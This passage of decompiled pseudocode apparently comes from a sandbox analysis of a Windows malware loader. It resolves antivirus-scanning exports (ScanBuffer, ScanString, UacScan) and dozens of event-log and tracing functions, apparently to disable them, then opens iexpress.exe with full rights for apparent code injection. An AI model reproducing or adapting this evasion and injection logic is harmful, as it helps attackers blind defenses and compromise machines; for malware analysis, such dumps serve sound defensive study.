                                                                								E025236CC(_v1728, _t3213, _t3636, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("ScanString");
                                                                								E02514C24();
                                                                								E02514A98( &_v1736, E02514D64(_v1740));
                                                                								_push(_v1736);
                                                                								_t3253 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1748, _t3253, 0x252ad5c);
                                                                								E02514A98( &_v1744, E02514D64(_v1748));
                                                                								_pop(_t3641); // executed
                                                                								E025236CC(_v1744, _t3213, _t3641, _t4138); // executed
                                                                								_t3642 =  *0x256dd00; // 0x2a1f418
                                                                								_t1915 =  *0x256da80; // 0x7f190018, executed
                                                                								E02525580(_t1915, _t3213,  &_v1752, _t3642, _t4137, _t4138); // executed
                                                                								E025148F4(0x256da48, _v1752);
                                                                								_t1919 =  *0x256dcf0; // 0x2a51bb8
                                                                								_t1920 = E02517DA0(_t1919, __eflags);
                                                                								_t1921 =  *0x256da48; // 0x7f210018
                                                                								E02525B34(_t1921, _t3213,  &_v1756, _t1920, _t4138);
                                                                								E025148F4(0x256da4c, _v1756);
                                                                								_t1925 =  *0x256da4c; // 0x7f110018
                                                                								E02525AC0(_t1925, _t3213,  &_v1756,  &_v1764, _t4137, _t4138);
                                                                								E02525910(_v1764,  &_v1756,  &_v1760);
                                                                								E025148F4(0x256da84, _v1760);
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("Initialize");
                                                                								E02514C24();
                                                                								E02514A98( &_v1768, E02514D64(_v1772));
                                                                								_push(_v1768);
                                                                								_t3256 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1780, _t3256, 0x252ad5c);
                                                                								E02514A98( &_v1776, E02514D64(_v1780));
                                                                								_pop(_t3653); // executed
                                                                								E025236CC(_v1776, _t3213, _t3653, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("OpenSession");
                                                                								E02514C24();
                                                                								E02514A98( &_v1784, E02514D64(_v1788));
                                                                								_push(_v1784);
                                                                								_t3257 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1796, _t3257, 0x252ad5c);
                                                                								E02514A98( &_v1792, E02514D64(_v1796));
                                                                								_pop(_t3658); // executed
                                                                								E025236CC(_v1792, _t3213, _t3658, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("UacScan");
                                                                								E02514C24();
                                                                								E02514A98( &_v1800, E02514D64(_v1804));
                                                                								_push(_v1800);
                                                                								_t3258 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1812, _t3258, 0x252ad5c);
                                                                								E02514A98( &_v1808, E02514D64(_v1812));
                                                                								_pop(_t3663); // executed
                                                                								E025236CC(_v1808, _t3213, _t3663, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("UacInitialize");
                                                                								E02514C24();
                                                                								E02514A98( &_v1816, E02514D64(_v1820));
                                                                								_push(_v1816);
                                                                								_t3259 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1828, _t3259, 0x252ad5c);
                                                                								E02514A98( &_v1824, E02514D64(_v1828));
                                                                								_pop(_t3668); // executed
                                                                								E025236CC(_v1824, _t3213, _t3668, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("ScanString");
                                                                								E02514C24();
                                                                								E02514A98( &_v1832, E02514D64(_v1836));
                                                                								_push(_v1832);
                                                                								_t3260 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1844, _t3260, 0x252ad5c);
                                                                								E02514A98( &_v1840, E02514D64(_v1844));
                                                                								_pop(_t3673); // executed
                                                                								E025236CC(_v1840, _t3213, _t3673, _t4138);
                                                                								_t2001 =  *0x256dcec; // 0x0
                                                                								E02514CB0(_t2001, 0x252ae54);
                                                                								if(__eflags == 0) {
                                                                									_t2662 =  *0x256dce4; // 0x2a51b88
                                                                									E02514CB0(_t2662, 0x252ae54);
                                                                									if(__eflags != 0) {
                                                                										_t2664 =  *0x256dce8; // 0x0
                                                                										E02514CB0(_t2664, 0x252ae54);
                                                                										if(__eflags != 0) {
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("ScanBuffer");
                                                                											E02514C24();
                                                                											E02514A98( &_v1848, E02514D64(_v1852));
                                                                											_push(_v1848);
                                                                											_t3280 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v1860, _t3280, 0x252ad5c);
                                                                											E02514A98( &_v1856, E02514D64(_v1860));
                                                                											_pop(_t3941);
                                                                											E025236CC(_v1856, _t3213, _t3941, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v1864, E02514D64(_v1868));
                                                                											_push(_v1864);
                                                                											_t3281 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v1876, _t3281, 0x252ad5c);
                                                                											E02514A98( &_v1872, E02514D64(_v1876));
                                                                											_pop(_t3946);
                                                                											E025236CC(_v1872, _t3213, _t3946, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push(0x252b020);
                                                                											_push(0);
                                                                											_push(0x252b02c);
                                                                											_push(0);
                                                                											_push(0x252b038);
                                                                											_push(0);
                                                                											_push(0x252b044);
                                                                											E02514C24();
                                                                											E02514A98( &_v1880, E02514D64(_v1884));
                                                                											_push(_v1880);
                                                                											_t3282 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v1892, _t3282, 0x252ad5c);
                                                                											E02514A98( &_v1888, E02514D64(_v1892));
                                                                											_pop(_t3951);
                                                                											E025236CC(_v1888, _t3213, _t3951, _t4138);
                                                                											E02514A98( &_v1896, "ReportEventA");
                                                                											_push(_v1896);
                                                                											E02514A98( &_v1900, "advapi32");
                                                                											_pop(_t3954);
                                                                											E025236CC(_v1900, _t3213, _t3954, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v1904, E02514D64(_v1908));
                                                                											_push(_v1904);
                                                                											_t3283 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v1916, _t3283, 0x252ad5c);
                                                                											E02514A98( &_v1912, E02514D64(_v1916));
                                                                											_pop(_t3959);
                                                                											E025236CC(_v1912, _t3213, _t3959, _t4138);
                                                                											E02514A98( &_v1920, "SystemFunction035");
                                                                											_push(_v1920);
                                                                											E02514A98( &_v1924, "advapi32");
                                                                											_pop(_t3962);
                                                                											E025236CC(_v1924, _t3213, _t3962, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v1928, E02514D64(_v1932));
                                                                											_push(_v1928);
                                                                											_t3284 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v1940, _t3284, 0x252ad5c);
                                                                											E02514A98( &_v1936, E02514D64(_v1940));
                                                                											_pop(_t3967);
                                                                											E025236CC(_v1936, _t3213, _t3967, _t4138);
                                                                											E02514A98( &_v1944, "ReportEventW");
                                                                											_push(_v1944);
                                                                											E02514A98( &_v1948, "advapi32");
                                                                											_pop(_t3970);
                                                                											E025236CC(_v1948, _t3213, _t3970, _t4138);
                                                                											E02524F34(E02514DBC(0x256da84), _t3213, _t3284, _t4137, _t4138, _t4158);
                                                                										}
                                                                									}
                                                                								}
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("ScanString");
                                                                								E02514C24();
                                                                								E02514A98( &_v1952, E02514D64(_v1956));
                                                                								_push(_v1952);
                                                                								_t3261 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1964, _t3261, 0x252ad5c);
                                                                								E02514A98( &_v1960, E02514D64(_v1964));
                                                                								_pop(_t3679); // executed
                                                                								E025236CC(_v1960, _t3213, _t3679, _t4138);
                                                                								_t2017 =  *0x256dce8; // 0x0
                                                                								E02514CB0(_t2017, 0x252ae54);
                                                                								if(__eflags == 0) {
                                                                									_t2529 =  *0x256dce4; // 0x2a51b88
                                                                									E02514CB0(_t2529, 0x252ae54);
                                                                									if(__eflags != 0) {
                                                                										_t2531 =  *0x256dcec; // 0x0
                                                                										E02514CB0(_t2531, 0x252ae54);
                                                                										if(__eflags != 0) {
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("ScanBuffer");
                                                                											E02514C24();
                                                                											E02514A98( &_v1968, E02514D64(_v1972));
                                                                											_push(_v1968);
                                                                											_t3273 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v1980, _t3273, 0x252ad5c);
                                                                											E02514A98( &_v1976, E02514D64(_v1980));
                                                                											_pop(_t3894);
                                                                											E025236CC(_v1976, _t3213, _t3894, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v1984, E02514D64(_v1988));
                                                                											_push(_v1984);
                                                                											_t3274 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v1996, _t3274, 0x252ad5c);
                                                                											E02514A98( &_v1992, E02514D64(_v1996));
                                                                											_pop(_t3899);
                                                                											E025236CC(_v1992, _t3213, _t3899, _t4138);
                                                                											WinExec("iexpress", 0);
                                                                											 *0x256da9c = E025245F8("iexpress.exe");
                                                                											_t2564 =  *0x256da9c; // 0x0
                                                                											 *0x256daa0 = OpenProcess(0x1f0fff, 0xffffffff, _t2564);
                                                                											_t2566 =  *0x256daa0; // 0x0
                                                                											_push(_t2566);
                                                                											L025237E0();
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v2000, E02514D64(_v2004));
                                                                											_push(_v2000);
                                                                											_t3275 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v2012, _t3275, 0x252ad5c);
                                                                											E02514A98( &_v2008, E02514D64(_v2012));
                                                                											_pop(_t3904);
                                                                											E025236CC(_v2008, _t3213, _t3904, _t4138);
                                                                											_t2582 = E02514DBC(0x256da84);
                                                                											_t2583 =  *0x256daa0; // 0x0
                                                                											E02523F94(_t2583, _t3213, _t2582, _t4137, _t4138, _t4158);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v2016, E02514D64(_v2020));
                                                                											_push(_v2016);
                                                                											_t3276 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v2028, _t3276, 0x252ad5c);
                                                                											E02514A98( &_v2024, E02514D64(_v2028));
                                                                											_pop(_t3910);
                                                                											E025236CC(_v2024, _t3213, _t3910, _t4138);
                                                                											E02514A98( &_v2032, "ReportEventA");
                                                                											_push(_v2032);
                                                                											E02514A98( &_v2036, "advapi32");
                                                                											_pop(_t3913);
                                                                											E025236CC(_v2036, _t3213, _t3913, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v2040, E02514D64(_v2044));
                                                                											_push(_v2040);
                                                                											_t3277 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v2052, _t3277, 0x252ad5c);
                                                                											E02514A98( &_v2048, E02514D64(_v2052));
                                                                											_pop(_t3918);
                                                                											E025236CC(_v2048, _t3213, _t3918, _t4138);
                                                                											E02514A98( &_v2056, "SystemFunction035");
                                                                											_push(_v2056);
                                                                											E02514A98( &_v2060, "advapi32");
                                                                											_pop(_t3921);
                                                                											E025236CC(_v2060, _t3213, _t3921, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v2064, E02514D64(_v2068));
                                                                											_push(_v2064);
                                                                											_t3278 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v2076, _t3278, 0x252ad5c);
                                                                											E02514A98( &_v2072, E02514D64(_v2076));
                                                                											_pop(_t3926);
                                                                											E025236CC(_v2072, _t3213, _t3926, _t4138);
                                                                											E02514A98( &_v2080, "ReportEventW");
                                                                											_push(_v2080);
                                                                											E02514A98( &_v2084, "advapi32");
                                                                											_pop(_t3929);
                                                                											E025236CC(_v2084, _t3213, _t3929, _t4138);
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v2088, E02514D64(_v2092));
                                                                											_push(_v2088);
                                                                											_t3279 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v2100, _t3279, 0x252ad5c);
                                                                											E02514A98( &_v2096, E02514D64(_v2100));
                                                                											_pop(_t3934);
                                                                											E025236CC(_v2096, _t3213, _t3934, _t4138);
                                                                										}
                                                                									}
                                                                								}
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("ScanString");
                                                                								E02514C24();
                                                                								E02514A98( &_v2104, E02514D64(_v2108));
                                                                								_push(_v2104);
                                                                								_t3262 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2116, _t3262, 0x252ad5c);
                                                                								E02514A98( &_v2112, E02514D64(_v2116));
                                                                								_pop(_t3685); // executed
                                                                								E025236CC(_v2112, _t3213, _t3685, _t4138);
                                                                								_t2033 =  *0x256dce4; // 0x2a51b88
                                                                								E02514CB0(_t2033, 0x252ae54);
                                                                								if(__eflags == 0) {
                                                                									_t2490 =  *0x256dce8; // 0x0
                                                                									E02514CB0(_t2490, 0x252ae54);
                                                                									if(__eflags != 0) {
                                                                										_t2492 =  *0x256dcec; // 0x0
                                                                										E02514CB0(_t2492, 0x252ae54);
                                                                										if(__eflags != 0) {
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("ScanBuffer");
                                                                											E02514C24();
                                                                											E02514A98( &_v2120, E02514D64(_v2124));
                                                                											_push(_v2120);
                                                                											_t3271 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v2132, _t3271, 0x252ad5c);
                                                                											E02514A98( &_v2128, E02514D64(_v2132));
                                                                											_pop(_t3880); // executed
                                                                											E025236CC(_v2128, _t3213, _t3880, _t4138); // executed
                                                                											_push(0x252ad5c);
                                                                											_push( *0x256dcd8);
                                                                											_push("OpenSession");
                                                                											E02514C24();
                                                                											E02514A98( &_v2136, E02514D64(_v2140));
                                                                											_push(_v2136);
                                                                											_t3272 =  *0x256dcd8; // 0x2a51b38
                                                                											E02514BB0( &_v2148, _t3272, 0x252ad5c);
                                                                											E02514A98( &_v2144, E02514D64(_v2148));
                                                                											_pop(_t3885); // executed
                                                                											E025236CC(_v2144, _t3213, _t3885, _t4138); // executed
                                                                											__eflags = 0;
                                                                											E02512FC4(0,  &_v2152);
                                                                											_push(_v2152);
                                                                											_t2526 = E02514DBC(0x256da84);
                                                                											_pop(_t2527); // executed
                                                                											E025248A4(_t2527, _t3213, _t2526, _t4138, _t4158); // executed
                                                                										}
                                                                									}
                                                                								}
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push(0x252b020);
                                                                								_push(0);
                                                                								_push(0x252b02c);
                                                                								_push(0);
                                                                								_push(0x252b038);
                                                                								_push(0);
                                                                								_push(0x252b044);
                                                                								E02514C24();
                                                                								E02514A98( &_v2156, E02514D64(_v2160));
                                                                								_push(_v2156);
                                                                								_t3263 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2168, _t3263, 0x252ad5c);
                                                                								E02514A98( &_v2164, E02514D64(_v2168));
                                                                								_pop(_t3691); // executed
                                                                								E025236CC(_v2164, _t3213, _t3691, _t4138); // executed
                                                                								E02514A98( &_v2172, "ReportEventA");
                                                                								_push(_v2172);
                                                                								E02514A98( &_v2176, "advapi32");
                                                                								_pop(_t3694); // executed
                                                                								E025236CC(_v2176, _t3213, _t3694, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("OpenSession");
                                                                								E02514C24();
                                                                								E02514A98( &_v2180, E02514D64(_v2184));
                                                                								_push(_v2180);
                                                                								_t3264 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2192, _t3264, 0x252ad5c);
                                                                								E02514A98( &_v2188, E02514D64(_v2192));
                                                                								_pop(_t3699); // executed
                                                                								E025236CC(_v2188, _t3213, _t3699, _t4138); // executed
                                                                								E02514A98( &_v2196, "SystemFunction035");
                                                                								_push(_v2196);
                                                                								E02514A98( &_v2200, "advapi32");
                                                                								_pop(_t3702); // executed
                                                                								E025236CC(_v2200, _t3213, _t3702, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("OpenSession");
                                                                								E02514C24();
                                                                								E02514A98( &_v2204, E02514D64(_v2208));
                                                                								_push(_v2204);
                                                                								_t3265 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2216, _t3265, 0x252ad5c);
                                                                								E02514A98( &_v2212, E02514D64(_v2216));
                                                                								_pop(_t3707); // executed
                                                                								E025236CC(_v2212, _t3213, _t3707, _t4138); // executed
                                                                								E02514A98( &_v2220, "ReportEventW");
                                                                								_push(_v2220);
                                                                								E02514A98( &_v2224, "advapi32");
                                                                								_pop(_t3710); // executed
                                                                								E025236CC(_v2224, _t3213, _t3710, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("ScanString");
                                                                								E02514C24();
                                                                								E02514A98( &_v2228, E02514D64(_v2232));
                                                                								_push(_v2228);
                                                                								_t3266 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2240, _t3266, 0x252ad5c);
                                                                								E02514A98( &_v2236, E02514D64(_v2240));
                                                                								_pop(_t3715); // executed
                                                                								E025236CC(_v2236, _t3213, _t3715, _t4138); // executed
                                                                								E02514A98( &_v2244, "ShellExecuteExA");
                                                                								_push(_v2244);
                                                                								E02514A98( &_v2248, "shell32");
                                                                								_pop(_t3718); // executed
                                                                								E025236CC(_v2248, _t3213, _t3718, _t4138); // executed
                                                                								E02514A98( &_v2252, "SuspendThread");
                                                                								_push(_v2252);
                                                                								E02514A98( &_v2256, "kernel32");
                                                                								_pop(_t3721);
                                                                								E025236CC(_v2256, _t3213, _t3721, _t4138);
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("OpenSession");
                                                                								E02514C24();
                                                                								E02514A98( &_v2260, E02514D64(_v2264));
                                                                								_push(_v2260);
                                                                								_t3267 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2272, _t3267, 0x252ad5c);
                                                                								E02514A98( &_v2268, E02514D64(_v2272));
                                                                								_pop(_t3726); // executed
                                                                								E025236CC(_v2268, _t3213, _t3726, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("Initialize");
                                                                								E02514C24();
                                                                								E02514A98( &_v2276, E02514D64(_v2280));
                                                                								_push(_v2276);
                                                                								_t3268 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2288, _t3268, 0x252ad5c);
                                                                								E02514A98( &_v2284, E02514D64(_v2288));
                                                                								_pop(_t3731); // executed
                                                                								E025236CC(_v2284, _t3213, _t3731, _t4138); // executed
                                                                								E02514A98( &_v2292, "WmiReceiveNotificationsW");
                                                                								_push(_v2292);
                                                                								E02514A98( &_v2296, "advapi32");
                                                                								_pop(_t3734); // executed
                                                                								E025236CC(_v2296, _t3213, _t3734, _t4138); // executed
                                                                								E02514A98( &_v2300, "WmiReceiveNotificationsA");
                                                                								_push(_v2300);
                                                                								E02514A98( &_v2304, "advapi32");
                                                                								_pop(_t3737);
                                                                								E025236CC(_v2304, _t3213, _t3737, _t4138);
                                                                								E02514A98( &_v2308, "WmiQuerySingleInstanceW");
                                                                								_push(_v2308);
                                                                								E02514A98( &_v2312, "advapi32");
                                                                								_pop(_t3740);
                                                                								E025236CC(_v2312, _t3213, _t3740, _t4138);
                                                                								E02514A98( &_v2316, "NotifyChangeEventLog");
                                                                								_push(_v2316);
                                                                								E02514A98( &_v2320, "advapi32");
                                                                								_pop(_t3743);
                                                                								E025236CC(_v2320, _t3213, _t3743, _t4138);
                                                                								E02514A98( &_v2324, "WmiQueryAllDataA");
                                                                								_push(_v2324);
                                                                								E02514A98( &_v2328, "advapi32");
                                                                								_pop(_t3746);
                                                                								E025236CC(_v2328, _t3213, _t3746, _t4138);
                                                                								E02514A98( &_v2332, "WmiOpenBlock");
                                                                								_push(_v2332);
                                                                								E02514A98( &_v2336, "advapi32");
                                                                								_pop(_t3749);
                                                                								E025236CC(_v2336, _t3213, _t3749, _t4138);
                                                                								E02514A98( &_v2340, "WmiNotificationRegistrationW");
                                                                								_push(_v2340);
                                                                								E02514A98( &_v2344, "advapi32");
                                                                								_pop(_t3752);
                                                                								E025236CC(_v2344, _t3213, _t3752, _t4138);
                                                                								E02514A98( &_v2348, "TraceQueryInformation");
                                                                								_push(_v2348);
                                                                								E02514A98( &_v2352, "advapi32");
                                                                								_pop(_t3755);
                                                                								E025236CC(_v2352, _t3213, _t3755, _t4138);
                                                                								E02514A98( &_v2356, "TraceSetInformation");
                                                                								_push(_v2356);
                                                                								E02514A98( &_v2360, "advapi32");
                                                                								_pop(_t3758);
                                                                								E025236CC(_v2360, _t3213, _t3758, _t4138);
                                                                								E02514A98( &_v2364, "TraceMessageVa");
                                                                								_push(_v2364);
                                                                								E02514A98( &_v2368, "advapi32");
                                                                								_pop(_t3761);
                                                                								E025236CC(_v2368, _t3213, _t3761, _t4138);
                                                                								E02514A98( &_v2372, "TraceMessage");
                                                                								_push(_v2372);
                                                                								E02514A98( &_v2376, "advapi32");
                                                                								_pop(_t3764);
                                                                								E025236CC(_v2376, _t3213, _t3764, _t4138);
                                                                								E02514A98( &_v2380, "TraceEvent");
                                                                								_push(_v2380);
                                                                								E02514A98( &_v2384, "advapi32");
                                                                								_pop(_t3767);
                                                                								E025236CC(_v2384, _t3213, _t3767, _t4138);
                                                                								E02514A98( &_v2388, "TraceEventInstance");
                                                                								_push(_v2388);
                                                                								E02514A98( &_v2392, "advapi32");
                                                                								_pop(_t3770);
                                                                								E025236CC(_v2392, _t3213, _t3770, _t4138);
                                                                								E02514A98( &_v2396, "SetTraceCallback");
                                                                								_push(_v2396);
                                                                								E02514A98( &_v2400, "advapi32");
                                                                								_pop(_t3773);
                                                                								E025236CC(_v2400, _t3213, _t3773, _t4138);
                                                                								E02514A98( &_v2404, "SetSecurityInfo");
                                                                								_push(_v2404);
                                                                								E02514A98( &_v2408, "advapi32");
                                                                								_pop(_t3776);
                                                                								E025236CC(_v2408, _t3213, _t3776, _t4138);
                                                                								E02514A98( &_v2412, "SetSecurityInfoExA");
                                                                								_push(_v2412);
                                                                								E02514A98( &_v2416, "advapi32");
                                                                								_pop(_t3779);
                                                                								E025236CC(_v2416, _t3213, _t3779, _t4138);
                                                                								E02514A98( &_v2420, "SetSecurityInfoExW");
                                                                								_push(_v2420);
                                                                								E02514A98( &_v2424, "advapi32");
                                                                								_pop(_t3782);
                                                                								E025236CC(_v2424, _t3213, _t3782, _t4138);
                                                                								E02514A98( &_v2428, "SetSecurityAccessMask");
                                                                								_push(_v2428);
                                                                								E02514A98( &_v2432, "advapi32");
                                                                								_pop(_t3785);
                                                                								E025236CC(_v2432, _t3213, _t3785, _t4138);
                                                                								E02514A98( &_v2436, "SetPrivateObjectSecurityEx");
                                                                								_push(_v2436);
                                                                								E02514A98( &_v2440, "advapi32");
                                                                								_pop(_t3788);
                                                                								E025236CC(_v2440, _t3213, _t3788, _t4138);
                                                                								E02514A98( &_v2444, "SetKernelObjectSecurity");
                                                                								_push(_v2444);
                                                                								E02514A98( &_v2448, "advapi32");
                                                                								_pop(_t3791);
                                                                								E025236CC(_v2448, _t3213, _t3791, _t4138);
                                                                								E02514A98( &_v2452, "SetFileSecurityW");
                                                                								_push(_v2452);
                                                                								E02514A98( &_v2456, "advapi32");
                                                                								_pop(_t3794);
                                                                								E025236CC(_v2456, _t3213, _t3794, _t4138);
                                                                								E02514A98( &_v2460, "SetFileSecurityA");
                                                                								_push(_v2460);
                                                                								E02514A98( &_v2464, "advapi32");
                                                                								_pop(_t3797);
                                                                								E025236CC(_v2464, _t3213, _t3797, _t4138);
                                                                								E02514A98( &_v2468, "SaferSetPolicyInformation");
                                                                								_push(_v2468);
                                                                								E02514A98( &_v2472, "advapi32");
                                                                								_pop(_t3800);
                                                                								E025236CC(_v2472, _t3213, _t3800, _t4138);
                                                                								E02514A98( &_v2476, "SaferSetLevelInformation");
                                                                								_push(_v2476);
                                                                								E02514A98( &_v2480, "advapi32");
                                                                								_pop(_t3803);
                                                                								E025236CC(_v2480, _t3213, _t3803, _t4138);
                                                                								E02514A98( &_v2484, "ReportEventW");
                                                                								_push(_v2484);
                                                                								E02514A98( &_v2488, "advapi32");
                                                                								_pop(_t3806);
                                                                								E025236CC(_v2488, _t3213, _t3806, _t4138);
                                                                								E02514A98( &_v2492, "ReportEventA");
                                                                								_push(_v2492);
                                                                								E02514A98( &_v2496, "advapi32");
                                                                								_pop(_t3809);
                                                                								E025236CC(_v2496, _t3213, _t3809, _t4138);
                                                                								E02514A98( &_v2500, "ReadEventLogW");
                                                                								_push(_v2500);
                                                                								E02514A98( &_v2504, "advapi32");
                                                                								_pop(_t3812);
                                                                								E025236CC(_v2504, _t3213, _t3812, _t4138);
                                                                								E02514A98( &_v2508, "ReadEventLogA");
                                                                								_push(_v2508);
                                                                								E02514A98( &_v2512, "advapi32");
                                                                								_pop(_t3815);
                                                                								E025236CC(_v2512, _t3213, _t3815, _t4138);
                                                                								E02514A98( &_v2516, "OpenEventLogW");
                                                                								_push(_v2516);
                                                                								E02514A98( &_v2520, "advapi32");
                                                                								_pop(_t3818);
                                                                								E025236CC(_v2520, _t3213, _t3818, _t4138);
                                                                								E02514A98( &_v2524, "OpenEventLogA");
                                                                								_push(_v2524);
                                                                								E02514A98( &_v2528, "advapi32");
                                                                								_pop(_t3821);
                                                                								E025236CC(_v2528, _t3213, _t3821, _t4138);
                                                                								E02514A98( &_v2532, "SaferRecordEventLogEntry");
                                                                								_push(_v2532);
                                                                								E02514A98( &_v2536, "advapi32");
                                                                								_pop(_t3824);
                                                                								E025236CC(_v2536, _t3213, _t3824, _t4138);
                                                                								E02514A98( &_v2540, "GetEventLogInformation");
                                                                								_push(_v2540);
                                                                								E02514A98( &_v2544, "advapi32");
                                                                								_pop(_t3827);
                                                                								E025236CC(_v2544, _t3213, _t3827, _t4138);
                                                                								E02514A98( &_v2548, "ElfReadEventLogW");
                                                                								_push(_v2548);
                                                                								E02514A98( &_v2552, "advapi32");
                                                                								_pop(_t3830);
                                                                								E025236CC(_v2552, _t3213, _t3830, _t4138);
                                                                								E02514A98( &_v2556, "ElfReadEventLogA");
                                                                								_push(_v2556);
                                                                								E02514A98( &_v2560, "advapi32");
                                                                								_pop(_t3833);
                                                                								E025236CC(_v2560, _t3213, _t3833, _t4138);
                                                                								E02514A98( &_v2564, "ElfOpenEventLogW");
                                                                								_push(_v2564);
                                                                								E02514A98( &_v2568, "advapi32");
                                                                								_pop(_t3836);
                                                                								E025236CC(_v2568, _t3213, _t3836, _t4138);
                                                                								E02514A98( &_v2572, "ElfOpenEventLogA");
                                                                								_push(_v2572);
                                                                								E02514A98( &_v2576, "advapi32");
                                                                								_pop(_t3839);
                                                                								E025236CC(_v2576, _t3213, _t3839, _t4138);
                                                                								E02514A98( &_v2580, "BuildSecurityDescriptorA");
                                                                								_push(_v2580);
                                                                								E02514A98( &_v2584, "advapi32");
                                                                								_pop(_t3842);
                                                                								E025236CC(_v2584, _t3213, _t3842, _t4138);
                                                                								E02514A98( &_v2588, "BuildImpersonateTrusteeW");
                                                                								_push(_v2588);
                                                                								E02514A98( &_v2592, "advapi32");
                                                                								_pop(_t3845);
                                                                								E025236CC(_v2592, _t3213, _t3845, _t4138);
                                                                								E02514A98( &_v2596, "BuildSecurityDescriptorW");
                                                                								_push(_v2596);
                                                                								E02514A98( &_v2600, "advapi32");
                                                                								_pop(_t3848);
                                                                								E025236CC(_v2600, _t3213, _t3848, _t4138);
                                                                								E02514A98( &_v2604, "AccessCheckByType");
                                                                								_push(_v2604);
                                                                								E02514A98( &_v2608, "advapi32");
                                                                								_pop(_t3851);
                                                                								E025236CC(_v2608, _t3213, _t3851, _t4138);
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("ScanBuffer");
                                                                								E02514C24();
                                                                								E02514A98( &_v2612, E02514D64(_v2616));
                                                                								_push(_v2612);
                                                                								_t3269 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2624, _t3269, 0x252ad5c);
                                                                								E02514A98( &_v2620, E02514D64(_v2624));
                                                                								_pop(_t3856); // executed
                                                                								E025236CC(_v2620, _t3213, _t3856, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("OpenSession");
                                                                								E02514C24();
                                                                								E02514A98( &_v2628, E02514D64(_v2632));
                                                                								_push(_v2628);
                                                                								_t3270 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v2640, _t3270, 0x252ad5c);
